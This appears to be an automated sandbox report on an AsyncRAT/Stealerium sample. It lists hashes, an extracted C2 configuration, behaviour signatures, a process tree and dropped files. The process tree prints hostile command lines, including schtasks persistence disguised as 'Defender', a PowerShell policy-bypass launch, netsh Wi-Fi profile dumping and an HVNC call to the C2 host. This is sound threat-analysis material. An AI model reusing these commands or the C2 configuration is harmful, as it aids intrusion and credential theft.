Analysis

  • max time kernel
    1048s
  • max time network
    431s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-08-2024 13:24

General

  • Target

    Infected.exe

  • Size

    63KB

  • MD5

    8b5d09ffbbfc800578025d9aff31ac68

  • SHA1

    cdeea0a7ffb18502d7cae832a13f6294285904ae

  • SHA256

    84912d357a09d920ded8c02f0236676f301bd26722ba6ad92165418c007cda89

  • SHA512

    a22e73029e4387b70c4242a2beef317b96a32996d523a76580914cd5582b3580f0de9d691aa1e688f74042463f7f8c10c2cd5ce3a3d2b178656c0fd84106a589

  • SSDEEP

    768:spDxI6PfZ778/IC8A+X3uazcBRL5JTk1+T4KSBGHmDbD/ph0oX/CLcCaSuEdpqKX:+62ZBwdSJYUbdh9/tiuEdpqKmY7

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

mode-clusters.gl.at.ply.gg:36304

Attributes
  • delay

    1

  • install

    true

  • install_file

    Defender.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Stealerium

    An open source info stealer written in C# first seen in May 2022.

  • Async RAT payload 1 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Start PowerShell.

  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 35 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Suspicious use of AdjustPrivilegeToken 58 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 21 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Infected.exe
    "C:\Users\Admin\AppData\Local\Temp\Infected.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3596
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Defender" /tr '"C:\Users\Admin\AppData\Roaming\Defender.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4556
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "Defender" /tr '"C:\Users\Admin\AppData\Roaming\Defender.exe"'
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:784
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB6CD.tmp.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2204
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:1528
      • C:\Users\Admin\AppData\Roaming\Defender.exe
        "C:\Users\Admin\AppData\Roaming\Defender.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Accesses Microsoft Outlook profiles
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        • outlook_office_path
        • outlook_win_path
        PID:1596
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mqjvct.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1608
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mqjvct.exe"'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3584
            • C:\Users\Admin\AppData\Local\Temp\mqjvct.exe
              "C:\Users\Admin\AppData\Local\Temp\mqjvct.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2072
              • C:\Windows\explorer.exe
                "C:\Windows\explorer.exe"
                7⤵
                • Boot or Logon Autostart Execution: Active Setup
                • Enumerates connected drives
                • Checks SCSI registry key(s)
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:3112
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" AnarchyHVNC mode-clusters.gl.at.ply.gg 36304 K5YHpV
                7⤵
                • System Location Discovery: System Language Discovery
                PID:3092
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
          4⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:2124
          • C:\Windows\system32\chcp.com
            chcp 65001
            5⤵
              PID:3628
            • C:\Windows\system32\netsh.exe
              netsh wlan show profile
              5⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:4220
            • C:\Windows\system32\findstr.exe
              findstr All
              5⤵
                PID:4908
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1764
              • C:\Windows\system32\chcp.com
                chcp 65001
                5⤵
                  PID:5084
                • C:\Windows\system32\netsh.exe
                  netsh wlan show networks mode=bssid
                  5⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:1532
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Defender" /tr '"C:\Users\Admin\AppData\Local\Temp\Defender.exe"' & exit
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3236
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "Defender" /tr '"C:\Users\Admin\AppData\Local\Temp\Defender.exe"'
                  5⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:3120
        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
          1⤵
          • Modifies registry class
          • Suspicious use of SetWindowsHookEx
          PID:4532
        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
          1⤵
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious use of SetWindowsHookEx
          PID:2908

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133680291362190709.txt

          Filesize

          75KB

          MD5

          946b87c0169c40baa61771eb50b455e4

          SHA1

          574c19fe6efcd826b7ee064cf46e9c0b07a61f4d

          SHA256

          15dc82651f5b697e13a9239666b652e3269b306e4b4ec01ebafa9862ea1b9e56

          SHA512

          597c9a8ab0938850984cd15faed22f3da6cab0c1382984171da5d18a20846c920b829a1aa40b8045c7291dd414a28a371da3ca5f538b8c3b329e79ecd335a926

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f3peybbg.5lg.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\mqjvct.exe

          Filesize

          61KB

          MD5

          c6ffbfacb26b9ac2c9147b3673880f49

          SHA1

          a81552481d23c29984eec445aa72531c97dc8050

          SHA256

          a2fccaf7fc55b4d8a759bfb9449137fc259235cdb342af4b1bfe6eb1d58d97fc

          SHA512

          9bbf5ad8938fbf808e5b8140856c846dc628d09b28f3bd39e98fc90defe5020a8db4ec70f0223b28651eafa2ed11b9cac3888605e42f59de1c914ada4190395f

        • C:\Users\Admin\AppData\Local\Temp\tmpB6CD.tmp.bat

          Filesize

          152B

          MD5

          d23be8b72cc0fa912d0a23757050a5b0

          SHA1

          e3d0f6447e8fe3536e2a57f41bd069ecde9dddbc

          SHA256

          44937114468eb3b55428f9251069314da13fdb6469e52bb8f1fe0a082e70efe1

          SHA512

          5047043fbb0c6e7a9505adc8b86e8880bf6261e8fc9655960d009b795f42f7a3d31aa3f763fe74b0c3edb741b87d8c8d84c61bd2faa61872573262cad0674ffb

        • C:\Users\Admin\AppData\Local\d79283e5b49dfaf1672975b4d6531e30\Admin@UXMRPRRI_en-US\Browsers\Mozilla\Firefox\Bookmarks.txt

          Filesize

          105B

          MD5

          2e9d094dda5cdc3ce6519f75943a4ff4

          SHA1

          5d989b4ac8b699781681fe75ed9ef98191a5096c

          SHA256

          c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

          SHA512

          d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

        • C:\Users\Admin\AppData\Local\d79283e5b49dfaf1672975b4d6531e30\Admin@UXMRPRRI_en-US\System\Process.txt

          Filesize

          533B

          MD5

          c9f89344d304665eaf753efd1d52ccff

          SHA1

          9d8b0dca27e427bfb06af4a0338767cfc99a3bbd

          SHA256

          d65f181ff954f81ad5913b7f30439752389caaa4db8d01c42fd2b52138aedac9

          SHA512

          c589f469b8ef0c79356b847dc42bcb3dbe8735c6f718f0a1c05c8708d447d65ff2e3d909bf851c3b8c777ae9789690a74076079526e15f575819c6e891e9d5cd

        • C:\Users\Admin\AppData\Local\d79283e5b49dfaf1672975b4d6531e30\Admin@UXMRPRRI_en-US\System\Process.txt

          Filesize

          2KB

          MD5

          f2826690fea952e58c0b177e9c3d82cd

          SHA1

          16aef6e5af2a0353305d58aebc965c75b1641aa6

          SHA256

          5b5e5e72ee72222a71e94353ca20cdc5b6d12ee951f48be20b80f75b6a1d24b2

          SHA512

          0edeb0779975c914cfbb97614b897ae7eb269db1ffbece0355bcfdbbee937c7307d60800d4ab2a6a9f7cf2a9584956907d15c87999f3e45583cc8e2c4c093b4d

        • C:\Users\Admin\AppData\Local\d79283e5b49dfaf1672975b4d6531e30\Admin@UXMRPRRI_en-US\System\Process.txt

          Filesize

          3KB

          MD5

          cb14a16ebe63b67d8c0f9c3ef7d1d06f

          SHA1

          6f5a8e0aec6309b4d2adaea8075cb0925c9cda9f

          SHA256

          de7a80a7faebf4b5072978ad669a78b830cc454de18333eed43b3a1efd2e2041

          SHA512

          f7fb6ba107bbd789659a7506fe7ec5edb448ca778e874dfd98116a00906d96c10ef316ba6fbba0df50c2bbc3506d0e310bfe7df17467c6122a1336a58b80a657

        • C:\Users\Admin\AppData\Local\d79283e5b49dfaf1672975b4d6531e30\Admin@UXMRPRRI_en-US\System\Process.txt

          Filesize

          3KB

          MD5

          6e504a7fa91ed779f75b730655d37d1a

          SHA1

          8ddb51db7d7cd2caeb84358c3c6584ee6fd64cca

          SHA256

          318db93802380183d161141ce67b376e27379e86fe43d2bb39a207e3984343cb

          SHA512

          9e8c1770f8733d42500e419c7ae38451523aec154e9166fa5d3fd149f829d222d0c83c4012b2499dc5ff4c4b797c71d916c94e5f2fbd153addd4e77975a09e5a

        • C:\Users\Admin\AppData\Local\d79283e5b49dfaf1672975b4d6531e30\Admin@UXMRPRRI_en-US\System\Process.txt

          Filesize

          5KB

          MD5

          60fa7cc0944c1eaa9452b4d9b8bafa64

          SHA1

          8d673b5bfdc595ee712df08c4905ac20c3b9f647

          SHA256

          eac9954396ff62f1ae1c0122156123cbe37d5ad79c92cf45ae7d3b3c6f3414c4

          SHA512

          6fc1161396033b7a2c71e278373cb97df2132dadc7d0437c78d40297ffaf16dcb7530d183a8a489b9af50cdd12384d1a2408114e2bc8d004eb889fa071e07020

        • C:\Users\Admin\AppData\Roaming\Defender.exe

          Filesize

          63KB

          MD5

          8b5d09ffbbfc800578025d9aff31ac68

          SHA1

          cdeea0a7ffb18502d7cae832a13f6294285904ae

          SHA256

          84912d357a09d920ded8c02f0236676f301bd26722ba6ad92165418c007cda89

          SHA512

          a22e73029e4387b70c4242a2beef317b96a32996d523a76580914cd5582b3580f0de9d691aa1e688f74042463f7f8c10c2cd5ce3a3d2b178656c0fd84106a589

        • memory/1596-16-0x000000001B8F0000-0x000000001B90E000-memory.dmp

          Filesize

          120KB

        • memory/1596-239-0x000000001CFE0000-0x000000001D168000-memory.dmp

          Filesize

          1.5MB

        • memory/1596-429-0x000000001E100000-0x000000001E1B2000-memory.dmp

          Filesize

          712KB

        • memory/1596-394-0x000000001C5E0000-0x000000001C65A000-memory.dmp

          Filesize

          488KB

        • memory/1596-14-0x000000001D1E0000-0x000000001D256000-memory.dmp

          Filesize

          472KB

        • memory/1596-15-0x0000000002EC0000-0x0000000002EF2000-memory.dmp

          Filesize

          200KB

        • memory/1596-244-0x0000000001560000-0x000000000156A000-memory.dmp

          Filesize

          40KB

        • memory/2072-32-0x0000000000BB0000-0x0000000000BC6000-memory.dmp

          Filesize

          88KB

        • memory/2908-44-0x000001F662A00000-0x000001F662B00000-memory.dmp

          Filesize

          1024KB

        • memory/2908-43-0x000001F662A00000-0x000001F662B00000-memory.dmp

          Filesize

          1024KB

        • memory/2908-71-0x000001F663F60000-0x000001F663F80000-memory.dmp

          Filesize

          128KB

        • memory/2908-48-0x000001F663B90000-0x000001F663BB0000-memory.dmp

          Filesize

          128KB

        • memory/2908-57-0x000001F663B50000-0x000001F663B70000-memory.dmp

          Filesize

          128KB

        • memory/3092-38-0x0000000005E80000-0x0000000005EE6000-memory.dmp

          Filesize

          408KB

        • memory/3092-37-0x0000000005FC0000-0x0000000006564000-memory.dmp

          Filesize

          5.6MB

        • memory/3092-36-0x00000000057E0000-0x000000000587C000-memory.dmp

          Filesize

          624KB

        • memory/3092-35-0x0000000005740000-0x00000000057D2000-memory.dmp

          Filesize

          584KB

        • memory/3092-33-0x0000000000400000-0x0000000000416000-memory.dmp

          Filesize

          88KB

        • memory/3112-41-0x0000000002EE0000-0x0000000002EE1000-memory.dmp

          Filesize

          4KB

        • memory/3584-23-0x0000010EEBCE0000-0x0000010EEBD02000-memory.dmp

          Filesize

          136KB

        • memory/3596-1-0x00007FFE8FBC3000-0x00007FFE8FBC5000-memory.dmp

          Filesize

          8KB

        • memory/3596-7-0x00007FFE8FBC0000-0x00007FFE90681000-memory.dmp

          Filesize

          10.8MB

        • memory/3596-2-0x00007FFE8FBC0000-0x00007FFE90681000-memory.dmp

          Filesize

          10.8MB

        • memory/3596-0-0x00000000002B0000-0x00000000002C6000-memory.dmp

          Filesize

          88KB